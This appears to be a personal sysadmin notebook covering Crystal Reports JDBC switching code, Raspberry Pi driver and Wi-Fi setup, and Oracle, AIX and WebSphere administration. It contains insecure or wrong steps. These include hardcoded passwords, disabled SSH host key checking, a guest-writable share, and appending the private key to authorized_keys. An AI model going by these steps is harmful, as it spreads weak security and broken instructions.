propertyBag.put("Server Name", SERVERNAME); //Optional property.
propertyBag.put("Connection String", CONNECTION_STRING);
propertyBag.put("Database Name", DATABASE_NAME);
//propertyBag.put("Server Type", "JDBC (JNDI)");
propertyBag.put("URI", URI);
propertyBag.put("Use JDBC", "false");
propertyBag.put("JDBC Connection String", CONNECTION_STRING);
propertyBag.put("Database Class Name", DBCLASSNAME);
propertyBag.put("Database DLL", DATABASE_DLL);
propertyBag.put("Connection Name", CONNECTION_STRING);
propertyBag.put("PreQEServerName", "server");
propertyBag.put("PASSWORD", "password");

connectionInfo.setAttributes(propertyBag);

//Set database username and password.
//NOTE: Even if these the username and password properties don't change when switching databases, the
//database password is *not* saved in the report and must be set at runtime if the database is secured.
connectionInfo.setUserName(DBUSERNAME);
connectionInfo.setPassword(DBPASSWORD);
connectionInfo.setKind(ConnectionInfoKind.SQL);

table.setConnectionInfo(connectionInfo);
rcd.getDatabaseController().logon(DBUSERNAME, DBPASSWORD);
//Update old table in the report with the new table.
dbController.setTableLocation(table, tables.getTable(i));

}

} catch (ReportSDKException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}

}

public static void changeDB4(ReportClientDocument rcd, String reportJndiName, ReportExportControl exportControl)
throws ReportSDKException {
IConnectionInfo oldConnectionInfo = new ConnectionInfo();
IConnectionInfo newConnectionInfo = new ConnectionInfo();

String DBUSERNAME = "dhdba";
String DBPASSWORD = "password";
String CONNECTION_STRING = "jdbc:oracle:thin:@server:1521:sid";
String SERVERTYPE = "JDBC (JNDI)";
String DATABASE_DLL = "crdb_oracle.dll";
String DATABASE = "server";
final String TRUSTEDCON = "false";
String DBCLASSNAME = "oracle.jdbc.driver.OracleDriver";
String USEJDBC = "true";
String SERVERNAME = "jdbc:oracle:thin:@server:1521:sid";
String CONNECTIONURL = "jdbc:oracle:thin:@server:1521:sid";
String SERVER = "server";
final String DATABASE_NAME = "sid";

// Assign the old Connection info to the reports current info
DatabaseController dbController = rcd.getDatabaseController();
oldConnectionInfo = dbController.getConnectionInfos(null).getConnectionInfo(0);

// Create a new propertybag for the new location
PropertyBag boPropertyBag1 = new PropertyBag();

// Set new table logon properties
boPropertyBag1.put("JDBC Connection String", CONNECTION_STRING);
boPropertyBag1.put("Trusted_Connection", TRUSTEDCON);
boPropertyBag1.put("Server Type", SERVERTYPE);
boPropertyBag1.put("Database DLL", DATABASE_DLL);
boPropertyBag1.put("Database", DATABASE);
boPropertyBag1.put("Database Class Name", DBCLASSNAME);
boPropertyBag1.put("Use JDBC", USEJDBC);
boPropertyBag1.put("Database Name", DATABASE_NAME);
boPropertyBag1.put("Server Name", SERVERNAME);
boPropertyBag1.put("Connection URL", CONNECTIONURL);
boPropertyBag1.put("Server", SERVER);

// Assign the properties to the connection info
newConnectionInfo.setAttributes(boPropertyBag1);

// Set the DB Username and Pwd
newConnectionInfo.setUserName(DBUSERNAME);
newConnectionInfo.setPassword(DBPASSWORD);

// The Kind of connectionInfos is SQL
newConnectionInfo.setKind(ConnectionInfoKind.SQL);

// set the parameters to replace.
// The 4 options are:
// _doNotVerifyDB
// _ignoreCurrentTableQualifiers
// _mapFieldByRowsetPosition
// _useDefault
int replaceParams = DBOptions._ignoreCurrentTableQualifiers + DBOptions._doNotVerifyDB;

ConnectionInfos infos = new ConnectionInfos();
infos.add(newConnectionInfo);
Iterator it = infos.iterator();
while (it.hasNext()) {
ConnectionInfo info = (ConnectionInfo) it.next();
PropertyBag bag = info.getAttributes();
System.out.println("EEEEE " + bag.getStringValue("JDBC Connection String"));
System.out.println("EEEEE " + info.getPassword());
}

exportControl.setDatabaseLogonInfos(infos); // 尝试用exportControl设置登录信息
}

// 唯有这个方法可行,其他都失败了
public static void switch_tables(DatabaseController databaseController) throws ReportSDKException {

final String TABLE_NAME_QUALIFIER = "DHDBA.";
final String SERVERNAME = "server";
final String CONNECTION_STRING = "Use JDBC=b(true);Connection URL=s(jdbc:oracle:thin:@server:1521:sid);"
+ "Database Class Name=s(oracle.jdbc.driver.OracleDriver);Server=s(server);"
+ "User ID=s(dhdba);Password=;Trusted_Connection=b(false);"
+ "JDBC Connection String=s(!oracle.jdbc.driver.OracleDriver!jdbc:oracle:thin:{userid}/{password}@server:1521:sid)";
final String JNDI_DATASOURCE_NAME = "testing";
final String DATABASE_CLASS_NAME = "oracle.jdbc.driver.OracleDriver";
final String DATABASE_DLL = "crdb_jdbc.dll";
final String DBURI = "!oracle.jdbc.driver.OracleDriver!jdbc:oracle:thin:{userid}/{password}@server:1521:sid";
final String DBUSERNAME = "dhdba";
final String DBPASSWORD = "password";

//Obtain collection of tables from this database controller.
Tables tables = databaseController.getDatabase().getTables();

//Set the datasource for all main report tables.
for (int i = 0; i < tables.size(); i++) {

ITable table = tables.getTable(i);

//Keep existing name and alias.
table.setName(table.getName());
table.setAlias(table.getAlias());

//Change properties that are different from the original datasource.
table.setQualifiedName(TABLE_NAME_QUALIFIER + table.getName());

//Change connection information properties.
IConnectionInfo connectionInfo = table.getConnectionInfo();

PropertyBag innerProp = connectionInfo.getAttributes();
innerProp.clear();

//Set new table connection property attributes.
PropertyBag propertyBag = new PropertyBag();

//Overwrite any existing properties with updated values.
propertyBag.put("Trusted_Connection", "b(false)");
propertyBag.put("Server Name", SERVERNAME);
propertyBag.put("Connection String", CONNECTION_STRING);
propertyBag.put("Server Type", "JDBC (JNDI)");
propertyBag.put("JNDI Datasource Name", JNDI_DATASOURCE_NAME);
propertyBag.put("Database Class Name", DATABASE_CLASS_NAME);
propertyBag.put("Use JDBC", "true");
propertyBag.put("URI", DBURI);
propertyBag.put("Database DLL", DATABASE_DLL);

connectionInfo.setAttributes(propertyBag);

//Set database username and password.
//NOTE: Even if these the username and password properties don't change when switching databases, the
//database password is *not* saved in the report and must be set at runtime if the database is secured.
connectionInfo.setUserName(DBUSERNAME);
connectionInfo.setPassword(DBPASSWORD);
connectionInfo.setKind(ConnectionInfoKind.SQL);

table.setConnectionInfo(connectionInfo);

//Update old table in the report with the new table.
databaseController.setTableLocation(table, tables.getTable(i));

}

}

}

参考资料:
http://www.sdn.sap.com/irj/boc/index?rid=/webcontent/uuid/909355da-5b84-2b10-76a4-eed3ccf9e650
http://www.sdn.sap.com/irj/boc/index?rid=/webcontent/uuid/c020cd81-5c84-2b10-3585-bff096303cf6

Linking Arduino Uno to the Raspberry Pi

1
2
3
4
5
6
7
8
sudo apt-get install arduino ( It will install openjdk-6-jre, librxtx-java, avr-libc, avrdude etc )<span></span><span></span>  
sudo apt-get install python-pip
pip install ino
mkdir blink; cd blink
ino init -t blink
ino build
ino upload (port: <span>default /dev/ttyACM0 for Uno)</span>
ino serial

Reference:

http://www.recantha.co.uk/blog/?p=1103
http://inotool.org/quickstart
http://netduinoplusfun.wordpress.com/2012/06/13/arduino-ide/
http://elinux.org/RPi_Serial_Connection
http://www.suppertime.co.uk/blogmywiki/2012/09/pi-shall-tweet-unto-arduino/
http://www.satsignal.eu/ntp/Raspberry-Pi-NTP.html
http://blog.oscarliang.net/raspberry-pi-and-arduino-connected-serial-gpio/
http://baldwisdom.com/category/raspberry-pi/
The linux document Project http://www.tldp.org/HOWTO/Text-Terminal-HOWTO-10.html

Oracle call store procedure

1
2
3
variable cur refcursor;
execute GET_APP_POOL_CURSOR(:cur, 'SCREEN', 'N');
print :cur
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
sf.getCurrentSession().doWork(new Work() {
@Override
public void execute(Connection conn) throws SQLException {
final CallableStatement cs = conn.prepareCall("{call GET_APP_POOL_CURSOR(?, ?, ?)}");
cs.registerOutParameter(1, oracle.jdbc.OracleTypes.CURSOR);
cs.setString(2, "aa");
cs.setString(3, "bb");

cs.execute();
final ResultSet rs = (ResultSet) cs.getObject(1);
while (rs.next()) {
final EvaluationAnpAppVW evaluationAnpAppVW = new EvaluationAnpAppVW();
evaluationAnpAppVW.setAnpPrdSeq(rs.getLong(2));
}
}
}

Install Mercury MW150US WIFI dongle on RPi

The wifi dongle cannot be recognized by command lsusb and lsusb, found the chipset of MW150US is rtl8188eu, not rtl8192cu, it is very important.

My RPi kernel is 3.2.27+, it is need to compile module rtl8188eu with RPi source code.

Procedure as below

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# apt-get install build-essential
#
# cd /usr/src
# wget -O rpi-3.2.27.tar.gz https://github.com/raspberrypi/linux/tarball/rpi-3.2.27
# tar xzf ./rpi-3.2.27.tar.gz
# KVER=`uname -r`
# mv raspberrypi-linux-* linux-$KVER
# cd linux-$KVER/
# sed -i 's/EXTRAVERSION =.*/EXTRAVERSION = +/' Makefile
# zcat /proc/config.gz > .config
# wget https://github.com/raspberrypi/firmware/raw/master/extra/Module.symvers
# make oldconfig
# make modules_prepare
# ln -s /usr/src/linux-$KVER /usr/src/linux
# ln -s /usr/src/linux-$KVER /lib/modules/$KVER/source
# ln -s /usr/src/linux-$KVER /lib/modules/$KVER/build

Get rtl8188eu source code from http://gutspot.com/wp-content/uploads/2013/01/8188eu_USB_linux.zip
unzip the file and go to directory driver
# make && make install

In my case, it’s all. The module rtl8188eu has been load into RPi, MW150US WIFI dongle can be recognized.

1
2
3
ifconfig -a
iwcofnig
iwlist wlan0 scan

If it does not work, try the following method,

1
2
3
4
5
6
7
8
# lsmod
# rmmod 8192cu
# insmod 8188eu.ko
# modprobe 8188eu
# modinfo 8188eu
for autoload in RPi
# echo "8188eu" >> /etc/modules
# echo "blacklist rtl8192cu" >> /etc/modprobe.d/blacklist.conf (not necessary)

sudo nano /etc/network/interfaces

1
2
3
4
5
6
7
8
9
10
11
auto lo

iface lo inet loopback
iface eth0 inet dhcp

auto wlan0
iface wlan0 inet dhcp
# try one of below options
wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
OR
pre-up wpa_supplicant -Dwext -iwlan0 -c/etc/wpa_supplicant.conf -B

sudo nano /etc/wpa_supplicant/wpa_supplicant.conf

1
2
3
4
5
6
7
8
9
network={
ssid="YOUR-SSID"
scan_ssid=1
proto=RSN
key_mgmt=WPA-PSK
pairwise=CCMP TKIP
group=CCMP TKIP
psk="WPA-PASSWORD" # wpa_passphrase
}

Join WIFI network by running from command prompt with wpa_cli

1
2
3
4
5
6
7
#wpa_cli
>scan
>scan_results
>add_network
>set_network 0 ssid "Xperia T2 Ultra"
>set_network 0 psk "74125896"
>enable_network 0

For reference

1
2
3
4
5
6
7
ssid:   your wifi name
scan_ssid: value of 1 means broadcast and value of 2 means hidden (suggest you enter value of 1)
psk: your wifi password
proto: your choice of RSN or WPA. RSN is WP2 and WPA is WPA1. (most config is RSN)
key_mgmt: your choice of WPA-PSK or WPA-EAP (pre-shared or enterprise respectively)
pairwise: your choice of CCMP or TKIP ( WPA2 or WPA1 respectively)
auth_alg: OPEN option is required for WPA and WPA2 (other option, SHARED & LEAP)

Then run

1
2
3
4
5
# /etc/init.d/networking restart
Or
# ifup wlan0

# dhclient wlan0

script for auto-start wifi connection(Optional) /etc/init.d/wifi-connect

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#!/bin/sh
#wifi-connect auto-start

case $1 in
start)
wpa_supplicant -B -iwlan0 -c/etc/wpa_supplicant/wpa_supplicant.conf -Dwext -s
wpa_cli -B -p/var/lib/run/wpa_supplicant -s
;;
stop)

;;
restart)

;;
*)
echo 'Usage:wifi-connect start|stop|restart'
;;
esac
exit 0

# chmod +x /etc/init.d/wifi-connect
# update-rc.d wifi-connect defaults
# update-rc.d -f wifi-connect remove

Install hostapd

  1. unzip wpa_supplicant_hostapd-0.8_rtw_20120803.zip
    go to directory hostapd and compile
    make && make install
    ** should not ** start hostapd by /etc/init.d/hostapd start just run
    /usr/local/bin/hostapd p2p_hostapd.conf -B
    then hostapd started with ssid DIRECT-RT
  2. config IP address
    ifconfig wlan0 192.168.0.1 netmask 255.255.255.0 (the segment should be match with udhcp)
  3. sudo apt-get udhcpd
    /etc/init.d/udhcp start

Open your mobile’s wifi to search ssid “DIRECT-RT” and pair with it using pasword “12345678”, it will obtain the IP adddress dynamically.

Reference:

http://omer.me/2012/04/setting-up-wireless-networks-under-debian-on-raspberry-pi/
http://tasksofohm.wordpress.com/hardware/connecting-raspberry-to-a-ew-7811un
http://www.ctrl-alt-del.cc/2012/05/raspberry-pi-meets-edimax-ew-7811un-wireless-ada.html
https://guts.me/2013/01/30/set-up-wifi-router-with-raspberry-pi-2-compile-driver-for-8188eu-and-set-up-hostap/
http://blog.elevendroids.com/2012/12/building-tp-link-tl-wn725n-wifi-usb-adapter-driver-for-raspberry-pi/
http://jarhead.blog.163.com/blog/static/175217041201317102236535/
http://alansun.iteye.com/blog/1150893

hostapd

http://www.raspberrypi.org/phpBB3/viewtopic.php?t=19120 http://elinux.org/RPI-Wireless-Hotspot

*** New Version for 3.12.22+ ***
Just install a script to install rtl8188eu.ko as below,
tar -zxvf 8188eu-201xyyzz.tar.gz
<–set data code for driver version above

1
2
3
sudo install -p -m 644 8188eu.ko /lib/modules/$(uname -r)/kernel/drivers/net/wireless
sudo insmod /lib/modules/$(uname -r)/kernel/drivers/net/wireless/8188eu.ko
sudo depmod -a

http://www.raspberrypi.org/forums/viewtopic.php?p=462982#p462982
http://www.fars-robotics.net/

SSH login without password

1
2
3
4
5
ssh-keygen -t rsa -b 2048
set passphase for id_rsa
copy id_rsa.pub to remoteIP's folder .ssh/
cat id_rsa >> authorized_keys
chmod 640 authorized_keys

Login with ssh

1
2
3
4
5
ssh-agent bash --login -i
ssh-add
ssh felix@remoteIP OR ssh -A felix@remoteIP (agent forwarding)
OR
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no felix@remoteIP (disable host key checking)

Login with putty

1
2
3
4
5
run puttygen.exe to convert id_rsa to putty's format
run pageant.exe to load private key
plink.exe felix@remoteIP
config as enable X11 forwarding in putty, and save the session as passwordless.
plink.exe -load passwordless

Reference

http://linuxcommando.blogspot.hk/2008/10/how-to-disable-ssh-host-key-checking.html
http://www.cnblogs.com/cheche/archive/2011/01/07/1918825.html

Light LED in Raspberry Pi

Command

1
2
3
4
5
6
7
login as root: su - root
connect gpio 17 pin and GND pin
echo 17 > /sys/class/gpio/export
echo out > /sys/class/gpio/direction
echo 1 > /sys/class/gpio/value # LED bright
echo 0 > /sys/class/gpio/value # LED dim
echo 17 > /sys/class/gpio/unexport

WiringPi

1
2
3
gpio mode 0 out
gpio write 0 1
gpio write 0 0

WiringPi-python

1
2
3
4
5
6
7
8
9
10
sudo get-apt install python-dev python-pip
sudo pip install wiringpi
or
sudo esay_install-2.7 wiringpi
blink.py
import wiringpi
io = wiringpi.GPIO(wiringpi.WPI_MODE_SYS)
io.pinMode(17,io.OUTPUT)
io.digitalWrite(18,io.HIGH) # Turn on light
io.digitalWrite(18,io.LOW) # Turn off

Reference

https://github.com/Gadgetoid/WiringPi2-Python
http://wiringpi.com/

ORA-01000 maximum open cursors exceeded

Get detail of opened cursors current

1
2
3
4
5
6
7
8
9
select * from gv$sysstat where name like '%open%'

select sum(a.value) total_cur, avg(a.value) avg_cur, max(a.value) max_cur,
s.username, s.machine
from gv$sesstat a, gv$statname b, gv$session s
where a.statistic# = b.statistic# and s.sid=a.sid
and b.name = 'opened cursors current'
group by s.username, s.machine
order by 1 desc;

Update open_cursors

1
2
3
show parameter open_cursors;

alter system set open_cursors=1000 scope=MEMORY; (如果启动时候定义了spfile,可以写scope=BOTH)

Kill session to let the parameter take effect

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
select
substr(a.spid,1,9) pid,
substr(b.sid,1,5) sid,
substr(b.serial#,1,5) ser#,
substr(b.machine,1,6) box,
substr(b.username,1,10) username,
-- b.server,
substr(b.osuser,1,8) os_user,
substr(b.program,1,30) program
from gv$session b, gv$process a
where
b.paddr = a.addr
and type='USER'
order by program, sid;

alter system kill session 'SID,SERIAL#'
e.g. alter system kill session '12,2653'

参考

http://superlee0815.blog.163.com/blog/static/10575132120091585954516/
http://blog.itpub.net/9399028/viewspace-695082
https://community.oracle.com/thread/362096

List grantee right in oracle

1
2
3
4
5
6
7
8
9
10
11
12
create user xx identified by password;

grant create session to xx;
grant select on USER to xx;
grant select on PAYMENT to xx;
grant select on COMPANY to xx;

select * from user_tab_privs where grantee = 'xx'

select * from sys.all_tables;
select * from sys.all_synonyms;
select * from sys.all_views;

Show Info about MSSQL Server

Show all tables

select * from information_schema.tables

Show user privilege

1
2
SELECT * FROM INFORMATION_SCHEMA.TABLE_PRIVILEGES
exec sp_helprotect

Change password of sa

1
2
3
osql -S yourservername -E
1> EXEC sp_password NULL, 'yourpassword', 'sa'
2> GO

dds4 and tsm backup

Backup

find /tmp/forest | backup -ivqf /dev/rmt0

Commands of controlling DDS4 tape

1
2
mt -t /dev/rmt0 rewind
mt -t /dev/rmt0 offline

Daily backup:

Backup /dh/db/bkup/exp/exp_ora_{dow}.dmp.gz

1
2
3
4
5
restore -Tvqf /dev/rmt0 (View)
restore -Tqdvf /dev/rmt0 /dh/db/bkup/exp
restore -rvqf /dev/rmt0 (Restore)
restore -xvqf /dev/rmt0
restore -xdvqf /dev/rmt0 /dh/db/bkup/exp

Weekly backup(system backup):

1
2
3
restore -s4 -Tvqf /dev/rmt0.1 (View)
lsmksysb -f /dev/rmt0
restore -s4 -rvqf /dev/rmt0.1 (Restore)

http://www.oucs.ox.ac.uk/hfs/backup/allcli/index.xml?splitLevel=-1

1
2
3
4
5
6
7
dsmc restore /dh/db/bkup/exp/exp_ora_1.dmp.gz
dsmc restore /dh/db/bkup/exp/exp_ora_1.dmp.gz /tmp/xx/
dsmc restore /dh/db/bkup/exp/* /tmp/xx/
dsmc query file
dsmc query backup "/dh/db/bkup/*" -subdir=yes
dsmc q ba "/dsmdb/bkup/exp/*" -subdir=yes (-inactive)
dsmc q ba "/dh/db/bkup/arch/*" -su=yes

System Performance Statistics Report Summary

statpack

1
2
ls -lt /sharedrive/data/statpack_result | grep MM
/sharedrive/scripts/perfstat/spreport.sh MM
1
2
3
4
sqlplus perfstat/password@"(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=DBServer)(PORT=1521))(CONNECT_DATA=(SERVICE_NAME=xxrac)))"
@$ORACLE_HOME/rdbms/admin/spreport.sql
@?/rdbms/admin/spreport.sql
@$ORACLE_HOME/rdbms/admin/sppurge.sql

find max, min snap_id

1
2
3
select startup_time, count(1) from STATS$snapshot where snap_time between to_date('2014-11-01', 'yyyy-mm-dd') and to_date('2014-11-30', 'yyyy-mm-dd') group by startup_time;

select * from STATS$snapshot where snap_time between to_date('2014-11-01', 'yyyy-mm-dd') and to_date('2014-11-30', 'yyyy-mm-dd') and to_char(startup_time, 'yyyy-mm-dd hh24:mi:ss') = '2014-10-16 18:42:52' order by snap_id;

http://burleson-dba.com/SP/

performance statistic

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/aix-combine-csv-daily-to-csv-month-parameter.sh Server 2015 07
/aix-calc-monthly-avg.sh Server 2015 07
/aix-calc-monthly-avg.sh Server 2015 07 | awk -F ',' '{print $2","$4"M"}'
/aix-calc-monthly-avg.sh Server 2015 07 | awk -F ',' '{print $2","$5"%"}'

select df.tablespace_name "Tablespace",
round(100 * ( (df.totalspace - tu.totalusedspace)/ df.totalspace)) || '%'
"Pct. Free"
from
(select tablespace_name,
round(sum(bytes) / 1048576) TotalSpace
from dba_data_files
group by tablespace_name) df,
(select round(sum(bytes)/(1024*1024)) totalusedspace, tablespace_name
from dba_segments
group by tablespace_name) tu
where df.tablespace_name = tu.tablespace_name order by df.tablespace_name ;

WEB server

1
2
3
4
5
6
D:\perfstat-bin\convert\relog-daily-blg-to-monthly-csv.bat 201501
./relog-daily-blg-to-monthly-csv.bat 201501
check D:\perfstat-csv

cd /cygdrive/d/perfstat-bin/convert
relog ../../PerfLogs/Web_201506*.blg -cf relog-parameters.txt -f csv -o ../../perfstat-csv/Web_201506.csv

Websphere deployment with script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$AdminApp install "/tmp/xx/session_replication/weiwei.ear" {-contextroot weiwei -appname WeiWeiEAR -node psuat -cell psuat -server server4 -MapWebModToVH {{"weiwei" weiwei.war,WEB-INF/web.xml default_host}} -MapResRefToEJB {{weiwei "" weiwei.war,WEB-INF/web.xml jdbc/psuat javax.sql.DataSource jdbc/psuat}} -MapModulesToServers {{weiwei weiwei.war,WEB-INF/web.xml WebSphere:cell=psuat,node=psuat,server=server4}} -installdir /piers/apps/uat/installedApps -verbose -nodeployws} 
$AdminApp install "/tmp/xx/weiwei.ear" {-contextroot weiwei -appname WeiWeiEAR -MapWebModToVH {{"weiwei" weiwei.war,WEB-INF/web.xml default_host}} -MapResRefToEJB {{weiwei "" weiwei.war,WEB-INF/web.xml jdbc/dhprd javax.sql.DataSource jdbc/dhprd}} -MapModulesToServers {{weiwei weiwei.war,WEB-INF/web.xml WebSphere:cell=dhwap02Network,cluster=dhwas_cluster}} -installdir /xx/apps/prod/installedApps -cluster xx_was -verbose -nodeployws}

$AdminConfig save
$AdminApp isAppReady sr
$AdminApp getDeployStatus sr

$AdminApp list
$AdminApp listModules sr

set appManager [$AdminControl queryNames type=ApplicationManager,*]
$AdminControl invoke $appManager startApplication sr
$AdminControl invoke $appManager stopApplication sr

$AdminApp uninstall sr

$AdminApp options /piers/apps/uat/installedApps/WeiWeiEAR.ear
$AdminApp taskInfo /piers/apps/uat/installedApps/WeiWeiEAR.ear MapResRefToEJB
$AdminApp taskInfo /piers/apps/uat/installedApps/WeiWeiEAR.ear MapModulesToServers
$AdminApp taskInfo /piers/apps/uat/installedApps/WeiWeiEAR.ear MapWebModToVH
$AdminApp taskInfo /piers/apps/uat/installedApps/eps.ear AppDeploymentOptions


$AdminControl queryNames "*:*"

Raspberry Practice

  1. Run raspi-config to set parameter
  2. Login as pi/raspberry, sudo passwd root
  3. Run sudo vi /boot/config.txt to set framebuffer
  4. Install JDK1.8.0 and run javafx samples http://javafx.steveonjava.com/javafx-on-raspberry-pi-3-easy-steps
  5. Install Tomcat
  6. Install TightVNC raspberry-pi-beginners-guide tightvnc
  7. Install transmission-daemon, transmission-remote-gui/java remember to disable rpc-white-list and set the login user/password pt-linux-vps setting-up-transmission-remote-gui-in
  8. Install samba sudo apt-get install samba
    /etc/samba/smb.conf
    1
    2
    3
    4
    5
    6
    7
    [bt-download]
    comment = transmission download folder
    browsable = yes
    path = /var/lib/transmission-daemon/downloads
    public = yes
    writable = yes
    guest ok = yes
  9. Install chromium sudo apt-get install chromium
  10. Install wiringPi https://projects.drogon.net/raspberry-pi/wiringpi/download-and-install
  11. Install xrdp (ru tightvncserver in backend imho) sudo apt-get install xrdp
  12. Install bluetooth sudo apt-get install bluez blueman
  13. Install mpd sudo apt-get install mpd mpc icecast2
    set bind_to_address to 0.0.0.0 in mpd.conf
    uncomment the block Icecast of audio_output
    streaming-audio-with-mpd-and-icecast2-on-raspberry-pi
  14. Install Pifm Turning_the_Raspberry_Pi_Into_an_FM_Transmitter
  15. check revision cat /proc/cpuinfo http://elinux.org/RPi_Hub And http://rpitc.blogspot.hk/

Reference

http://whatswhat.no/computer/linux/raspberry-pi/481-raspberry-pi-mediacenter-raspbmc-setup-and-use-ipad-or-iphone-as-remote
http://blog.thestateofme.com/2012/05/27/raspberry-pi-on-ipad/
http://www.oracle.com/technetwork/articles/java/raspberrypi-1704896.html

http://projectdp.wordpress.com/2012/09/24/pi-k3w-kindle-3-display-for-raspberry-pi/
http://www.raspberrypi.org
https://www.riscosopen.org/news/articles/2012/10/26/risc-os-pi-released-risc-os-for-the-raspberry-pi
http://www.reddit.com/r/raspberry_pi/comments/zoivv/kindleberry_pi/

在AIX上增加文件系统空间

显示活动的卷组

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
dhdev01 / # lsvg -o
bkvg
vg01
vg02
rootvg
列出对应的物理卷
dhdev01 / # lsvg -p rootvg
rootvg:
PV_NAME PV STATE TOTAL PPs FREE PPs FREE DISTRIBUTION
hdisk0 active 546 111 00..00..00..02..109
dhdev01 / # lsvg -p vg01
vg01:
PV_NAME PV STATE TOTAL PPs FREE PPs FREE DISTRIBUTION
hdisk1 active 546 135 00..00..00..26..109
dhdev01 / # lsvg -p vg02
vg02:
PV_NAME PV STATE TOTAL PPs FREE PPs FREE DISTRIBUTION
hdisk2 active 546 109 00..00..00..00..109


dhdev01 / # ls -al /dev/rootvg
crw-rw---- 1 root system 10, 0 Dec 19 2003 /dev/rootvg

显示卷组的基本信息

1
2
3
4
5
6
7
8
9
10
11
12
13
dhdev01 / # lsvg rootvg
VOLUME GROUP: rootvg VG IDENTIFIER: 00585c0f00004c00000000f98e1e377f
VG STATE: active PP SIZE: 128 megabyte(s)
VG PERMISSION: read/write TOTAL PPs: 546 (69888 megabytes)
MAX LVs: 256 FREE PPs: 111 (14208 megabytes)
LVs: 16 USED PPs: 435 (55680 megabytes)
OPEN LVs: 13 QUORUM: 2
TOTAL PVs: 1 VG DESCRIPTORS: 2
STALE PVs: 0 STALE PPs: 0
ACTIVE PVs: 1 AUTO ON: yes
MAX PPs per PV: 1016 MAX PVs: 32
LTG size: 128 kilobyte(s) AUTO SYNC: no
HOT SPARE: no BB POLICY: relocatable

显示该卷组存在的所有逻辑卷

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
dhdev01 / # lsvg -l rootvg
rootvg:
LV NAME TYPE LPs PPs PVs LV STATE MOUNT POINT
hd5 boot 1 1 1 closed/syncd N/A
hd6 paging 32 32 1 open/syncd N/A
hd8 jfslog 1 1 1 open/syncd N/A
hd4 jfs 3 3 1 open/syncd /
hd2 jfs 88 88 1 open/syncd /usr
hd9var jfs 8 8 1 open/syncd /var
hd3 jfs 22 22 1 open/syncd /tmp
hd1 jfs 8 8 1 open/syncd /home
hd10opt jfs 3 3 1 open/syncd /opt
lg_dumplv sysdump 8 8 1 open/syncd N/A
lv00 jfs 148 148 1 open/syncd /u01
lv01 jfs 24 24 1 open/syncd /u02
lv02 jfs 24 24 1 open/syncd /oradisk
dh jfs 32 32 1 open/syncd /dh
loglv03 jfs2log 1 1 1 closed/syncd N/A
fslv00 jfs2 32 32 1 closed/syncd /cd0

显示所有物理卷的基本信息

1
2
3
4
5
dhdev01 / # lspv
hdisk0 00585c0f8e1e2d11 rootvg active
hdisk1 00585c0f746525a4 vg01 active
hdisk2 00585c0f545aca55 vg02 active
hdisk3 00585c0f418e185b bkvg active

显示某个物理卷的基本信息

1
2
3
4
5
6
7
8
9
10
11
dhdev01 / # lspv hdisk0
PHYSICAL VOLUME: hdisk0 VOLUME GROUP: rootvg
PV IDENTIFIER: 00585c0f8e1e2d11 VG IDENTIFIER 00585c0f00004c00000000f98e1e377f
PV STATE: active
STALE PARTITIONS: 0 ALLOCATABLE: yes
PP SIZE: 128 megabyte(s) LOGICAL VOLUMES: 16
TOTAL PPs: 546 (69888 megabytes) VG DESCRIPTORS: 2
FREE PPs: 111 (14208 megabytes) HOT SPARE: no
USED PPs: 435 (55680 megabytes)
FREE DISTRIBUTION: 00..00..00..02..109
USED DISTRIBUTION: 110..109..109..107..00

显示该物理卷上存在的所有逻辑卷

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
dhdev01 / # lspv -l hdisk0
hdisk0:
LV NAME LPs PPs DISTRIBUTION MOUNT POINT
hd5 1 1 01..00..00..00..00 N/A
lv00 148 148 53..43..17..35..00 /u01
dh 32 32 32..00..00..00..00 /dh
lv02 24 24 24..00..00..00..00 /oradisk
hd6 32 32 00..32..00..00..00 N/A
lg_dumplv 8 8 00..08..00..00..00 N/A
lv01 24 24 00..16..08..00..00 /u02
hd2 88 88 00..10..65..13..00 /usr
hd8 1 1 00..00..01..00..00 N/A
hd4 3 3 00..00..01..02..00 /
hd9var 8 8 00..00..04..04..00 /var
hd3 22 22 00..00..06..16..00 /tmp
hd1 8 8 00..00..06..02..00 /home
hd10opt 3 3 00..00..01..02..00 /opt
loglv03 1 1 00..00..00..01..00 N/A
fslv00 32 32 00..00..00..32..00 /cd0

如果卷组内只有一个物理卷,那么卷组内的逻辑卷信息和物理卷内的逻辑卷信息是一致的。

显示物理卷中的每个物理分区(outer edge, outer middle, center, inner middle, inner edge)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
dhdev01 / # lspv -p hdisk1
hdisk1:
PP RANGE STATE REGION LV NAME TYPE MOUNT POINT
1-32 used outer edge db jfs /dh/db
33-36 used outer edge rdhdev_test2 raw N/A
37-74 used outer edge testdb jfs /test
75-110 used outer edge rdhdev_test raw N/A
111-190 used outer middle db jfs /dh/db
191-191 used outer middle loglv00 jfslog N/A
192-219 used outer middle patch jfs /opt/patch
220-223 used center patch jfs /opt/patch
224-261 used center testdb2 jfs /test2
262-281 used center db jfs /dh/db
282-287 used center patch jfs /opt/patch
288-328 used center db jfs /dh/db
329-409 used inner middle db jfs /dh/db
410-410 used inner middle lv03 raw N/A
411-411 used inner middle rawtest raw N/A
412-437 free inner middle
438-546 free inner edge

显示某个逻辑卷的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
dhdev01 / # lslv hd1
LOGICAL VOLUME: hd1 VOLUME GROUP: rootvg
LV IDENTIFIER: 00585c0f00004c00000000f98e1e377f.8 PERMISSION: read/write
VG STATE: active/complete LV STATE: opened/syncd
TYPE: jfs WRITE VERIFY: off
MAX LPs: 512 PP SIZE: 128 megabyte(s)
COPIES: 1 SCHED POLICY: parallel
LPs: 8 PPs: 8
STALE PPs: 0 BB POLICY: relocatable
INTER-POLICY: minimum RELOCATABLE: yes
